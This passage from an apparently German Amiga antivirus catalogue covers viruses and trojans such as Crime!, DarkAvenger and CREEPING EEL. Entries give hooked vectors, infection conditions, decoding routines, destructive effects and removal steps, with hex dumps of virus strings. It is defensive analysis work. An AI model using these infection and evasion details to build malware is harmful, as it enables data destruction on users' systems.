aber nicht bedeuten, dass nicht doch ein ver- aendertes LX103 existiert hat. - Copy-SAVE-Installer Name frueher Copy_LX Trojan Der Installvorgang konnte mit lx103 nie nachvollzogen werden. Jetzt ist ein CrunchMania-File 1.91 aufgetaucht, das copy veraendert. CrunchMania-Filelaenge : 46656 Bytes Dieses Teil erzeugt das veraenderte copy-File (s.u.) wirklich. Keine verbogenen Vektoren Es wird auch eine Systemzeit in das copy-Trojan-Teil geschrieben. D.h. es muss nicht immer auf 13. Juni 94 geprueft werden. Dies wurde durch einen Vermehrungstest nachvollzogen. - Copy-SAVE-Trojan Zerstoerungsfile Name frueher Copy_LX Trojan hat NICHTS mit COP-Trojanern zu tun Copy gelinkt Laenge: 6932 Bytes Copy orig. KS3.0 : 5496 Bytes Keine verbogenen Vektoren VT bietet Ausbau an. Ablauf: Es sind drei codierte Bereiche im Link, wovon zwei mit sub.b #$xy,d0 decodiert werden. Es ergibt sich: c: NICHT decodiert s:SAVE scsi Es wird zuerst nach s:SAVE gesucht. Falls gefunden, normal copy aus- fuehren. Also wahrscheinlich ein Schutz fuer den Programmierer. Die Systemzeit wird geprueft. Vor 13. Juni 94 normaler Copy-Befehl. Die Dos-Strukturen werden auf scsi (scsi.device) untersucht. Falls nicht gefunden, normaler Copy-Befehl. Es wird eine Berechnung durchgefuehrt, die in den Rootblock Nullen schreiben soll. Die Festplattenpartition waere dann unbrauchbar. Versuchen Sie z.B. mit DiskSalv zu retten, was zu retten ist. Da das Teil mit lsl.l #x,d0 (mehrmals=9) arbeitet, wird nur bei Festplatten mit Blockgroesse 512 der Rootblock geloescht. Neuere KS koennen aber auch andere Blockgroessen verwalten (HDToolBox). Der Installer ist noch UNBEKANNT !!! Es wird LX1.03 genannt, aber ich finde nichts in dem File. Falls jemand "mehr Glueck" hat, bitte ich um einen Hinweis. Danke !! Laenge bei mir: LX 17040 LX020 16764 Nachtrag Mai 98: Es ist ein Installer (s.o.) aufgetaucht. Da es sich nicht um LX103 handelt, wurde der Name geaendert. Bei Tests, die erst mit dem Installer moeglich waren, wurde auch festgestellt, dass bei jeder Anlage eines neuen Copy-Trojans sich auch die Datumsabfrage aendert (d.h. es wird nicht immer auf 13. Juni 94 getestet). - CopyLock-Virus BB Block 0-3 Bitte NICHT mit Original-BB CopyLock verwechseln. Cool $7F498 nach Reset DoIo $7F4C8 KS 2.04: ja Fordert trackdisk.device NICHT Namensbegruendung: s.u. Vermehrung: BB Dazu wird der urspruengliche BB geladen, ein paar Bytes am An- fang einkopiert und dann mit Virus in Block 2 u. 3 wieder ab- gespeichert. Bei einem fluechtigen Blick sehen Sie zum Beispiel noch einen Text und denken es waere noch der Original-BB. LASSEN SIE SICH NICHT TAEUSCHEN !!!!! Schaeden: Da es sich um 4 Blocke handelt wird nicht nur der Original-BB zerstoert, sondern auch ein File das Datenbloecke in Block 2 und 3 hat. Ablauf: Es werden 4 Bloecke nach $7F000 kopiert und grosse Teile mit sub.b d5,(a0)+ decodiert. Bei der Neucodierung fuer eine neue Verseuchung ist d5 abhaengig von $DFF006 . Das Teil wird aktiviert mit DoIo und lesendem Zugriff auf Block 880 ( nur bei DD-Disk Rootblock). Die Textteile werden NIE gezeigt. 20436f70 796c6f63 6b20416d 69676120 Copylock Amiga 28632920 526f6220 4e6f7274 6865726e (c) Rob Northern 2e20416c 6c207269 67687473 20726573 . All rights res 65727665 642e2000 41fa01fc 43f90007 erved. .A...C... ;........ 2a205945 50212052 4f42204e 4f525448 * YEP! ROB NORTH 45524e20 4f4e2054 48452042 4f415244 ERN ON THE BOARD 2021204d 5920434f 50594c4f 434b5320 ! MY COPYLOCKS 41524520 4655434b 00205448 45204352 ARE FUCK. THE CR 41434b45 52532041 52452042 45545445 ACKERS ARE BETTE 52205448 414e204d 452e2054 48415460 R THAN ME. THAT` 53205748 59204960 4d205752 4954494e S WHY I`M WRITIN 47202056 49525553 45532021 21212028 G VIRUSES !!! ( 494e2054 48452048 4f504520 54484154 IN THE HOPE THAT 20544845 59204152 45204245 54544552 THEY ARE BETTER 20415320 4d592043 4f50594c 4f434b53 AS MY COPYLOCKS 2129202a 00000000 00000000 00000000 !) *............ Hinweis: da das VirusTeil Block 2 u. 3 nicht als belegt kenn- zeichnet, kann bei einem Speichervorgang Block 2/3 neu beschrie- ben werden, wenn diese Bloecke im BitMapBlock frei waren. Da das Virusteil zerstoert ist, der Sprungbefehl in Block 0 aber noch vorhanden ist, werden Sie wahrscheinlich beim Booten eine GURU-Meldung bekommen. - CpuCache KEIN Virus !!!!!! Filelaenge: 8352 Bytes richtiger Name: KillRDB Also ein Programm um den Rigidbereich zu sichern und DANACH zu loeschen. Wenn Sie im Cli nur "cpuCache" eingeben, erhalten Sie eine Meldung, dass Parameter fehlen. Ich habe keine Ahnung, wer die Falschaussage, dieses File sei ein Virus, in die Welt ge- setzt hat. - Crackright anderer Name: Disk-Doktors s.u. - CRACKER Exterminator BB Cool: $7AEAA DoIo: $7AEC2 Fordert trackdisk.device NICHT KS2.04: ja Namensbegruendung: im BB ist uncodiert zu lesen 54686520 43524143 4b455220 45787465 The CRACKER Exte 726d696e 61746f72 48e7fffe 6000002c rminatorH...`.., Der BB enthaelt auch einen codierten Bereich eori.b #$27,(a1)+ , der NIE erreicht wird: 303c00ad 46110a19 002751c8 fff84869 0<..F....'Q...Hi 20686163 6b657221 20796f75 7220616d hacker! your am 69676120 69732069 6e666563 74656420 iga is infected 77697468 2061206e 65772067 656e6572 with a new gener 6174696f 6e206f66 20766972 75732063 ation of virus c 616c6c65 643a2054 68652043 5241434b alled: The CRACK 45522045 78746572 6d696e61 746f7220 ER Exterminator 21206d61 64652062 793a2041 3a433a43 ! made by: A:C:C 3a57205b 416e7469 2d437261 636b6572 :W [Anti-Cracker 2d436c75 622d5765 73745d20 68617665 -Club-West] have 2066756e 2c20796f 75206675 636b696e fun, you fuckin 67206372 61636b65 72210000 00000000 g cracker!...... Vermehrung: BB Schaeden: Aktiviert wird das Teil, wenn mit DoIo lesend auf Block 880 (ist nur bei DD-Disk der RootBlock) zugegriffen wird. In Abhaengigkeit von der Zaehlzelle bei $7FF00 (4) findet eine Vermehrung statt oder die "FloppyMusik"-Routine wird ge- startet. Diese Routine beansprucht ihr LW sehr stark und kann deshalb zu Hardware-Schaeden fuehren. Diese Routine ist vom Gadaffi-Virus abgekupfert. - Cracker Ext. Installer (erzeugt BB s.o.) File verseucht: 50868 Bytes BB-Teil ausgebaut: 49152 Bytes An ACP (BBS) wurde mit Hunklab ein BootJob-File gehaengt. In diesem BootJob-File wurde der Programmierername geloescht. Im Virus-BB wurde der uncodierte Text mit sinnlosen Zeichen ueber- schrieben. Der eor-codierte Bereich ist weiterhin mit gleichem Inhalt vorhanden. VT sollte Ausbau anbieten. Vgl. auch TAI7-Installer, East-Star-Install - cREATOr-Prg Formatroutine Schwachsinn !!!!! Besteht aus 2 Files In c CREATOR.SCR 40 Bytes IN s cREATOr.DAT 2880 Bytes KEINE verbogenen Vektoren KEINE Vermehrung In File-ID wird behauptet: * Thiz Powerful Tool Will Let You Choose * * How Fazt Your HD (Mili Seconds) Shall * * Run After Every Reset !!! Normally Thiz * Laut Dok soll der User execute c:creator.scr eingeben. Darauf DARF NIEMAND hereinfallen. In der shell wird Return-Taste gefordert Danach erscheint eine Format-Zeile. Die Disk heisst danach cREATOr. Meine Meinung: Schwachsinn Gefaehrlich ist also eigentlich nur das cREATOr.DAT Teil und die File-ID. Hinweis: cREATOr.DAT wurde auch auf PD-Disk-Serien (1988/89) ge- funden. Nur heisst es da format und der Sinn des Files ist leicht zu erkennen. >>RAD:c/Format >> cREATOr-Prg Um eine Fehlerkennung zu vermindern, erkennt VT nur DANN ein cREATOr-Prg, wenn das format-File cREATOr.DAT heisst (wie vom Virus vorgegeben) UND genau 2880 Bytes (wie vom Virus vorge- geben) lang ist. Wenn ein anderes Antivirusprogramm jeden format-Befehl mit der Laenge 2880 oder 2892 usw. als creator-Virus erkennt, so handelt es sich um eine FEHLERKENNUNG. Ich gehe davon aus, dass der Fehler bei diesem Antivirusprogramm im naechsten Update behoben wird. - CREEPING EEL BB Vergleiche auch: Executor.BB, Kimble.BB Namensbegruendung: siehe unten KS2.04: nein Fordert trackdisk.device NICHT verbogene Vektoren: Cool, DoIo Speicherlage: immer ab $7EC00 Vermehrung und Schaeden: BB UND !!!!! Schreibt in einen Zylinder, der bei einer Disk (880kb) dem Root-Zylinder entspricht (bei Festplatte ergibt sich ein anderer Zyl.), Datenmuell aus Speicher ab $60000. Diese Disks sind NICHT MEHR zu retten. Tut mir leid. Versuchen Sie bitte mit z.B. disksalv noch einige File von anderen Zylindern zu retten. Sobald die Zaehlzelle den Wert $14 erreicht hat: - Deutschland-Farben auf dem Bildschirm - Text, der uncodiert im BB steht 2d204865 6c6c6f20 436f6d70 75746572 - Hello Computer 66726561 6b202d2d 2d000016 004e596f freak ---....NYo 75277665 20676f74 206e6f77 20796f75 u've got now you 72206669 72737420 56495255 532e0000 r first VIRUS... 002a0068 2a2a2a2a 20544845 20435245 .*.h**** THE CRE 4550494e 47204545 4c20202a 2a2a2a00 EPING EEL ****. 002f0082 4d616e79 20446973 6b732061 ./..Many Disks a 72652069 6e666563 74656420 21210000 re infected !!.. 001e00b4 57726974 74656e20 6279203e ....Written by > 4d415820 4f462053 5441524c 49474854 MAX OF STARLIGHT 3c200000 003c00be a9203239 2e30342e < ...<... 29.04. 31393932 203c3c4d 41583e3e 20200000 1992 <<MAX>> .. - Crime! Linkvirus verlaengert ein File um 1000 Bytes. Haengt sich an den ersten Codehunk an. Cool, AllocMem, Dos: Open, LoadSeg, Dosbase+$2e KS2.04 = NEIN Kein Meldeprogrammteil gefunden. Kann sich MEHRMALS in gleiches File haengen, da schon-befallen Routine fehlt. (nach 3 Links ans gleiche File habe ich aufgehoert) Allerdings muss dazwischen immer ein anderes File aufgerufen wer- den, damit der Filenamenbuffer (vom VirusPrg. angelegt) ueberschrie- ben wird. Im Speicher werden 19 Bytes mit eori.b #$5e,-1(a5) decodiert: Crime!00dos.library Vermehrungsbedingungen: - Flag Disk o.k. ($52) - #16 Block free - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - letzter Befehl im 1.Hunk ist #$4E75 (RTS). Virus traegt dann $4E71 (NOP) ein. oder wird bis $3E+1 Wort-Schritte zurueck gefunden. Virus traegt dann $60xy (bra.s xy) ein. - Name enthaelt nicht: #, *, -, ., ?, Speichererkennung mit VT getestet: 15.02.92 Ausbau mit VT getestet: 16.02.92 wichtig !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! Hinweis 31.08.92: Ab VT2.44 sollten mehrere CrimeLinks ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - Crime!++ Linkvirus verlaengert ein File um 872 Bytes. Haengt sich an den ersten Codehunk an. Cool, Wait, Dos: Dosbase+$2e KS2.04 = NEIN (die Linkroutine wird zwar aktiviert, aber Dosbase+$2e stimmt NICHT. Deshalb kein Link sondern haeufig GURU. Kein Meldeprogrammteil gefunden. Kann sich MEHRMALS in gleiches File haengen, da schon-befallen Routine fehlt. (nach 5 Links ans gleiche File habe ich aufgehoert) Im Speicher werden $1A5+1 Worte mit eor.w d1,(a0)+ decodiert: Crime!++ d1 wird bei jedem Linkversuch ueber $DFF00A neu festgelegt. Vermehrungsbedingungen: - Flag Disk o.k. ($52) - #16 Block free - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - letzter Befehl im 1.Hunk ist #$4E75 (RTS). Virus traegt dann $4E71 (NOP) ein. oder wird bis $3F+1 Wort-Schritte zurueck gefunden. Virus traegt dann $60xy (bra.s xy) ein. Speichererkennung mit VT getestet: 24.05.92 Ausbau mit VT getestet: 25.05.92 wichtig !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! wichtig 2: verseuchte Files sind lauffaehig: VT sollte den Urzustand wieder herstellen koennen. verseuchte Files sind NICHT lauffaehig: Die Linkroutine ist nicht ++ , sondern enthaelt mehrere Fehler- quellen, die in Crime! nicht vorhanden waren. EINEN Fehler er- kennt VT und versucht ihn beim Ausbau auszubessern. Bitte mit einer Kopie ausbauen !!!! wichtig 3: Es werden AUCH Files mit einem "." im Namen verseucht. Beweis: Es wurde ein Datablock ausgedruckt. Danach waren ver- seucht: c/print, devs/printer.device, devs/parallel.device, und devs/printer/NEC . wichtig 4: Nach dem Ausbau rufen Sie bitte BlockITest auf und loeschen alle jetzt noch gefunden Crime!++ - Bloecke (auf der Diskkopie!!!). Das entseuchte File wird nicht unbedingt an die gleiche Stelle auf der Disk zurueckgespielt und so kann ein NICHT mehr aufrufbarer Block stehenbleiben. Danach rufen Sie bitte Blockkette auf und testen die Files auf richtige Verkettung. Sollten vor BlockITest bei BlockKette alle Files noch in Ordnung gewesen sein und jetzt nicht mehr, dann fuehren Sie bitte mit der Disk, die noch nicht mit BlockItest nachbehandelt wurde ein EinzelFileCopy durch. Auch hier werden nur die belegten und benutzten Blocks kopiert. UND rufen Sie mich bitte an. Danke Hinweis 31.08.92: Ab VT2.44 sollten mehrere Crime++Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke Ursprung: driveinfo trojanisches Pferd s.u. Nachtrag Nov.96: Es werden im Moment einige Crime++-Files herumge- geben, die im Moment von den Antivirusprogrammen nicht erkannt wer- den. Lassen Sie sich nicht verunsichern. Bei diesen Files ist zwar ein Crime++ enthalten und VT erkennt die Teile z.B. beim BlockKette- Test. Aber!!!!! Die Struktur dieser Files ist FALSCH !!!! Keines dieser Files (zumindest was mir vorliegt) ist ausfuehrbar !!! Ein Startversuch aus der Shell wird auf all meinen Testrechnern IMMER abgebrochen (not executable) OHNE Aktivierung des Virusteils im Speicher !!!!! - Crime'92 Linkvirus verlaengert ein File um 1800 Bytes 1.HunkEnde Namensbegruendung: decodiert im Speicher: 4372696D 65273932 000048E7 FFFE47FA Crime'92.. Fordert trackdisk.device NICHT resetfest, Virusprogramm meldet sich nicht. Liegt immer im ChipMem. Codierung wechselt. Verbogene Vektoren bis KS1.3 einschl. : Cold, Cool, Wait (exec) dosbase+$2e Verbogene Vektoren ab KS1.4 ($23) : Cool, Wait (exec), LoadSeg, NewLoadSeg 68040: NUR OHNE Cache Schaeden: abhaengig vom Wert einer Zaehlzelle: Schreibt in Block 2-7 (=6 Blocks) von Track 0 Speichermuell (der geschriebene Speicher kann auch nur Nullen enthalten). Sollten da Datenbloecke von Programmen gelegen haben, so sind diese Programme unbrauchbar. KEINE Rettung moeglich. Tut mir leid. Wenn das VirusPrg nun den Rigid-Track ihrer Festplatte zerstoert (fordert trackdisk.device NICHT), so ist die Festplatte nach dem naechsten Reset NICHT mehr ansprechbar !!!! Ich hoffe Sie haben ein Backup ????? ab Block 2 move.l #$400,$2c(a1) 6 Blocks move.l #$C00,$24(a1) Vermehrung: - Flag Disk o.k. ($52) (validated) - #8 Block frei - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - Test auf schon befallen - Virus sucht ab Ende 1.Hunk nach RTS. Steht RTS genau am Ende, dann wird es mit den ersten zwei Bytes von $48e7fffe (movem.l d0-a6,-(a7)) ueberschrieben. Steht RTS nicht am Ende, dann wird bis $3e+1 Wort-Schritte zurueck gesucht. Virus traegt $60xy (bra.s xy) ein. - Die CodierRoutine ist sehr variabel gestaltet: - Wechsel der CodierRoutine - Wechsel des Beginns des codierten Bereichs im Virus- teil Speichererkennung mit VT getestet: 22.10.92 Ausbau mit VT getestet: 23.10.92 wichtig1 !!!!!!! Bitte aktivieren Sie die DruckOption zuerst in Prefs. Es koennte mit den notwendigen Druckprogrammen Crime'92 eingeladen werden. Beim naechsten GadgetKlick im Hauptfenster MUSS VT den Crime'92 dann im Speicher finden !!!! Zumindest bei meinen Tests. wichtig2 !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! Nachtrag 03.07.93: Crime 92 Variante (CodierRoutine anders) erhalten. Fileerkennung musste geaendert werden. Speichererkennung musste NICHT geaendert werden. Nachtrag 04.07.93: Es ist ein verseuchtes Testfile aus absolut zuverlaessiger Quelle aufgetaucht, bei dem das letzte Langwort im Originalhunk zerstoert war . Dieses File ist AUCH nach dem Crime92-Ausbau noch defekt. Beispiel: der 1.Hunk wuerde mit "dos.library",0 enden. Bei diesem Vorgang wuerde dann "dos.libr",$5cef5def entstehen. Beim Ver- such, die dos.library zu oeffnen wuerde ein Fehler entstehen. Es ist mir in zwei Stunden nicht gelungen, diese Variante selbst zu erzeugen. - CSP-BB-Virus Name: decodiert mit eor: 596f7520 73656520 4353502c 20427974 You see CSP, Byt 65205761 7272696f 72207265 616c6c79 e Warrior really 2063616e 206d616b 65206120 76697275 can make a viru 7320696e 2074776f 20686f75 72732121 s in two hours!! Verbogene Vektoren: - DoIo immer 7F0EE - KickTag immer 7F0CC Speicherlage immer 7F000 - D&A FileVirus Laenge:1052 Bytes anderer Name SCA Dos Kill Cool immer $7E3CE und nach Reset auch DoIo KS2.04: keine BB-Verseuchung gelungen, Vektoren aber verbogen Schaeden: Das FileVirus schreibt bis KS1.3 auf eine nicht schreib- geschuetzte Disk einen BB dem die DOS0-Kennung fehlt. Dort steht dafuer $00000400 . Das Betriebssystem meldet deshalb mit einem Requester "Not a Dos Disk" . Schreiben Sie einfach einen Standard- Bootblock auf diese Disk. Der defekte BB ist ein leicht geaenderter SCA-BB (z.B. SCA! durch D&A! ersetzt). Das File muessen Sie loeschen. Schauen Sie bitte auch in der startup-sequence nach, ob dieser File- name vorkommt und loeschen Sie diese Zeile. Vermutung: Dieser BB wurde mit einem Prg. erzeugt, das aus einem BB ein Execute-File macht. Gibt es leider auch auf FF. Lesen Sie dazu auch FileTest bei SP-File-Sp in VT2.xyd . - D-Structure A/B/C-Virus immer ab $7C000 oldOpenLib immer $7C06E Write (-$30) immer $7C0CC nicht resetfest Name: D-Structure in der Mitte des Files zu lesen Typ A: Filelaenge: 428 Bytes Typ B: Filelaenge: 352 Bytes (haeufig Absturz) Typ C: Filelaenge: 464 Bytes (21.10.92) Typ A u. B : ffd24e75 0007c200 0007c204 442d5374 ..Nu........D-St 72756374 75726500 c24033ee 000003ec ructure..@3..... Typ C: C2000007 C204442D 53747275 63747572 A...A.D-Structur 65202000 000003F3 00000000 00000002 e ....o........ ^^^^ ^^ also mit zwei zusaetzlichen Leerzeichen Ablauf: - allocabs $7C000 - oldOpenlib wird gerettet und verbogen - wenn nun ein anderes Programm oldopenlib aufruft, wird getestet ob dos.library geoeffnet werden soll. wenn nein: z.B. intuition.lib - newopenlib wird ausgefuehrt und D-Structure wartet weiter wenn ja: - dosBase wird gerettet - Orig-Write wird gerettet und verbogen - oldopenlib wird zurueckgesetzt - newopenlib wird ausgefuehrt beim 5. Aufruf von Write wird nun nicht das Gewuenschte ge- schrieben (in cli, auf disk usw.), sondern das VirusPrg ab $7C000. Dieses File auf Disk ist leider nicht zu retten. - VirusPrg meldet sich NICHT !!!! Empfehlung: loeschen Sie das VirusPrg und alle zerstoerten Files. Ueberpruefen Sie bitte die startup-sequence. D-Structure A/B-File-Erkennung mit VT getestet: 09.09.92 D-Structure A/B-Speicher mit VT getestet: 09.09.92 D-Structure C mit VT getestet: 21.10.92 - DAG Cool, im Prg DoIo und zurueck, Fastmem ja, immer ab $7ec00 eine Meisterleistung: in den SCA-Text wurde eingebaut: Try ANTIVIRUS from DAG Erzeuger: DAG_Creator ungepackt:7000 Bytes oder 7360 Bytes schreibt Dag in BB von df1: - dailer-BBS V2.8g Von der Definition kein Virus, da keine Ver- mehrung. Ein Einbruchswerkzeug in BBS . Das Hauptprogramm duerfte eine Bluebox sein. Gepackt mit CrunchMania: Laenge: 11992 Bytes Laenge entpackt: 33908 Bytes Wird von VT entpackt als XLink erkannt. Also war meine Ver- mutung, dass auch dieses Programm fuer Viren missbraucht wird, RICHTIG !!!! Im File ist dann zu lesen: 79006262 733a7573 65722e64 61746100 y.bbs:user.data. 6262733a 6e6f6465 312f4e4f 43414c4c bbs:node1/NOCALL 45525341 54333030 00010000 000003ec ERSAT300........ ;....... 4469616c 65722076 322e3867 2f555044 Dialer v2.8g/UPD 41544544 20425920 53545249 4b455220 ATED BY STRIKER Oeffnet user.data und speichert ein paar Bytes in NOCALLERSAT300 ab. Hinweis: Entpacken Sie das File. VT sollte dann XLink erkennen. Gehen Sie dann in den File-Requester. Klicken Sie das File an und anschliessend auf 1Linkaus. Der 1.Link sollte im File abgeschaltet werden. Nachkontrollieren koennen Sie das mit SnoopDos, wenn Sie VT nicht trauen. SnoopDos -l darf keinen Lock auf bbs:user.data mehr anzeigen. - DAMAGE-Trojan (Zerstoerung) Bekannte Archivnamen: lzx12reg.lha Keine verbogenen Vektoren Nicht resetfest Es werden zwei Files entpackt: lzx.reg 8264 Bytes (ein gepackter Format-Befehl) lzx 67196 Bytes Im File ist zu lesen: 6d7b m{ 792f7366 68216573 6a776621 6569313b y/sfh!esjwf!ei1; 216f626e 66214542 4e424846 !obnf!EBNBHF Wenn Sie mit -1 arbeiten, ergibt sich: lzx.reg drive dh0: name DAMAGE Es soll also dh0 formatiert werden. - DarkAvenger-Virus Link Starke Aehnlichkeit mit Infiltrator (nur dosopen statt loadseg). Also keine Meisterleistung. Die Namenswahl zeugt von grosser Selbstueberschaetzung . Verbiegt DosOpen Nicht resetfest KS 1.3: ja KS 2.04: ja A4000/40 : 10 Files sind gelaufen und haben eine Disk jeweils komplett verseucht. Ablauf: Auf A2000 mit KS2.04 wurde eine komplette Disk verseucht. Auf dieser Disk sind dann unge- faehr 20 verseuchte Files auf dem A2000 ohne GURU gelaufen. Von diesen 20 verseuchten Files waren auf dem A4000/40 10 Files ohne Guru lauffaehig. (Cache aus) Typ A und Typ B sind bekannt. siehe unten Das Virusteil haengt sich immer neu codiert nach dem 1.Hunk ein. Arbeitsweise gleich fuer Typ A und B: - Sucht nach dem Langwort, das die Laenge des 1.CodeHunks enthaelt und erhoeht den Wert um $11A (TypA) oder $10C (TypB) . - Schreibt zu Beginn des 1. CodeHunks 6100xxyy (bsr xxyy) d.h. der OriginalSourceCode wird ueberschrieben. - Haengt sich codiert am Ende des 1.OriginalCodeHunks an. d.h. keine Erhoehung der HunkAnzahl. Vermehrungsbedingungen: - Disk validated - mindestens 8 Bloecke Platz - 1. CodeHunk nicht groesser als $1ffc * 4 = $7FF0 - Filelaenge groesser #2000 Bytes und - Filelaenge kleiner #100000 Bytes - Test 1. Wort im CodeHunk auf - $4EF9 (Jmp) falls ja keine Verseuchung - $4EB9 (Jsr) falls ja keine Verseuchung - Test ob schon von DarkAvenger verseucht 1. Wort im CodeHunk auf - $6100 (bsr) falls ja 2. Test an anderer Stelle auf - $FFFE6004 (Typ A) oder $FFFE4E71 (Typ B) falls ja schon verseucht, deshalb Ende. Ergebnis: verseucht auch libs, devices, fonts usw. Erfolg: NICHT alle Programme sind danach lauffaehig !!!!! Typ A: Verlaengert ein File um $11a x 4 = $468 = #1128 Bytes In Abhaengigkeit von $DFF006 wird mit setwindowtitles -=- The Dark Avenger -=- gesetzt Selbsterkennung im Speicher mit $A0A1 Decodiert mit subi.b x,(a3)+ ( x aendert sich bei jeder Ver- mehrung in Abhaengigkeit von $DFF006 ) ist im Speicher zu lesen: 6974696f 6e2e6c69 62726172 7900202d ition.library. - 3d2d2054 68652044 61726b20 4176656e =- The Dark Aven 67657220 2d3d2d00 ger -=-. Typ B: Verlaengert ein File um $10c x 4 = $430 = #1072 Bytes Die setwindowtitles-Routine fehlt. Selbsterkennung im Speicher mit $A0A1A2A3 Decodiert mit eori.b x,(a3)+ ( x aendert sich bei jeder Ver- mehrung in Abhaengigkeit von $DFF006 ) ist im Speicher zu lesen: 732e6c69 62726172 79005265 6d696e64 s.library.Remind 65727320 6f662070 61737420 2c206665 ers of past , fe 6172206f 66207468 65206675 74757265 ar of the future 3a205345 50544943 20534348 495a4f2e : SEPTIC SCHIZO. 3d2d2054 68652044 61726b20 4176656e =- The Dark Aven 67657220 2d3d2d00 ger -=-. Ausbau: VT versucht den Originalzustand wieder herzustellen. Falls es Probleme gibt, wenden Sie sich bitte an mich. NACH dem FileTest machen Sie bitte ein EinzelFileCopy auf eine leere formatierte Disk. (QUICK genuegt nicht) Diskcopy nuetzt nichts, da dabei alle Bloecke kopiert werden. Zwei Gruende: - die Fragmentierung der Files wird aufgehoben (Disk ist wieder schneller) - es werden nur benutzte Bloecke kopiert, d.h. jetzt nicht mehr von Files belegte Bloecke werden nicht mitkopiert und so kann dann auch BlockITest keinen DarkAvenger auf der NEUEN Disk in einem unbenutzten Block finden. Beispiel siehe unten Block: 23 0000: 00000008 0000048f 0000000e 0000004c ...............L 0010: 00000000 00000000 815b0864 94717800 .........[.d.qx. 0020: 716c1612 0a717cc5 2e3b1680 1f23f407 ql...q|..;...#.. 0030: f469d07d 1c0d278d 90280351 3d800401 .i.}..'..(.Q=... 0040: 3d000c1c 9d6fc6cd 3e9cab9f fde08dc4 =....o..>....... 0050: 02400408 81420010 0c04f46d 00246c09 .@...B.....m.$l. 0060: 000003f2 2a20e8b5 4e759044 7200e8ad ....* ..Nu.Dr... ^^^^ ;hier neues FileEnde 0070: 6708e9b1 51c8fff8 4e752a20 e8b560f2 g...Q...Nu* ..`. 0080: 300461e8 70001035 10003401 b4466616 0.a.p..5..4..Ff. 0090: 61cc6502 700761d2 36017002 61ced441 a.e.p.a.6.p.a..A 00a0: b24767f6 600461c2 3601d444 17333000 .Gg.`.a.6..D.30. 00b0: 51cafffa 33cb00df f1a2b5cb 65804e75 Q...3.......e.Nu 00c0: 09090909 000024b4 4e468280 48e7fffe ......$.NF..H... ^^^^^^^^ alter VirusCode Das alte Virusteil ist im Block geblieben, und wurde vom neuen Fileende nicht ueberschrieben, da nicht der ganze Block benoetigt wird. VT wuerde im BlockITest den Dark Avenger finden. Im FileTest NATUERLICH NICHT !!!! Dies hat NICHTS mit VT zu tun, sondern liegt am Amiga- Betriebssystem. Suche: Sie MUESSEN mit FileTest suchen. Bei BlockKette kann eine Meldung unterbleiben, wenn von den 3 Testlangworten 2 im Block x und 1 LW im Block x+1 liegen. Bitte: Suchen Sie NICHT nach verseuchten Files, solange ein sogenanntes "Nutzprogramm" aktiv ist, das dosopen verbiegt. Hinter diesem Nutzprg koennte der DarkAvenger liegen !!! Folge: Das Nutzprogramm ueberprueft beim Laden das File und stellt fest, dass das File von ihm NICHT zu bearbeiten ist (also z.B. nicht gepackt) und uebergibt an den "OrigDos- Open-Vektor". Nur leider ist der "OrigDosOpen-Vektor" auf die DarkAvenger-Routine verbogen !!!! Ihre Erfolgsaussichten sind NULL !!!!!! Falls VT das "Nutzprogramm" nicht kennt, koennen Sie im Hauptfenster in Tools mit setze OVektoren dosopen zuruecksetzen. Hinweis fuer Szeneprogrammierer: Der Trick mit Hunk_Symbol, Hunk_Name oder ChipKennung verhindert bei diesem Virus- teil den Linkvorgang NICHT (!!!!!), da mit cmpi.w #$3E9,(a0)+ gearbeitet wird. Hinweis: starten Sie BITTE den Druck IMMER aus Prefs. Hier wird das printer.device nach Aufruf auf Linkvirusbefall geprueft. - DARTH VADER File Laenge: 784 Bytes Cool und nach Reset auch OldOpenLib Vermehrung und Schaeden: - sobald OldOpenLib verbogen ist, versucht sich das Prg. im Root-Verzeichnis als $A0 zu vermehren. In die 1.Zeile der Startup-Sequence wird $A00A geschrieben. - sobald in der Zaehlzelle der Wert 6 steht, wird mit Output ausgegeben: VIRUS(V1.1) BY DARTH VADER Fehlerquellen: nicht mit KS2.04 nicht mit FastMem mit 1Mb Chip nur mit setpatch r Kann nur eine startup-sequence bis zur Groesse #1000 richtig veraendern. Empfehlung: loeschen und 1.Zeile in der startup-sequence mit Editor ebenfalls loeschen. Loeschen mit VT getestet: 26.04.92 - DASA anderer Name: ByteWarrior s.o. - DAT '89 nur KS1.2 da DoIoRomEinsprung, KickTag, KickCheckSum immer 7F800, versucht durch Text im BB zu taeuschen: THIS BOOT RESETS ALL VECTORS usw. Sobald die Zaehlzelle $F erreicht, DisplayAlert: DAT '89!!! Fordert NICHT trackdisk.device !!!! Schaeden: schreibt sich in BB zerstoert Block 880 und 881 (bei Disk Root falls DD-Disk) - DAT89-TAI9-Clone: Text geaendert: 3b2d2d29 2e2c3a2e 542e2e41 2c2c492e ;--).,:.T..A,,I. 2e495800 00000000 00002020 67726170 .IX....... grap - DATA CRIME CCCP-Clone s.o. BB Vermehrung auch mit ROM KS2.04 CCCP-VIRUS in DATA CRIME geaendert (irre Leistung) hat aber bei VT NICHTS genuetzt !!!, also lasst das - DATACRIME-killer BB s.o. ASV-BB Endlich hat es wieder jemand geschafft den ASCII-Text zu aendern .. THIS BOOTBLOCK KNOWS SOME OLD AND NEW VIRUSES usw. Wird von VT weiterhin als ASV erkannt. Pech gehabt !! - DATALOCK BB BB ist codiert Decodierter BB im Speicher immer ab $7F700 Verbogene Vektoren: DoIo, KickTag und im Prg. dann DisplayAlert Fordert trackdisk.device NICHT !!! Ich hab das mit der SyQuest ausprobiert. Wenn Sie 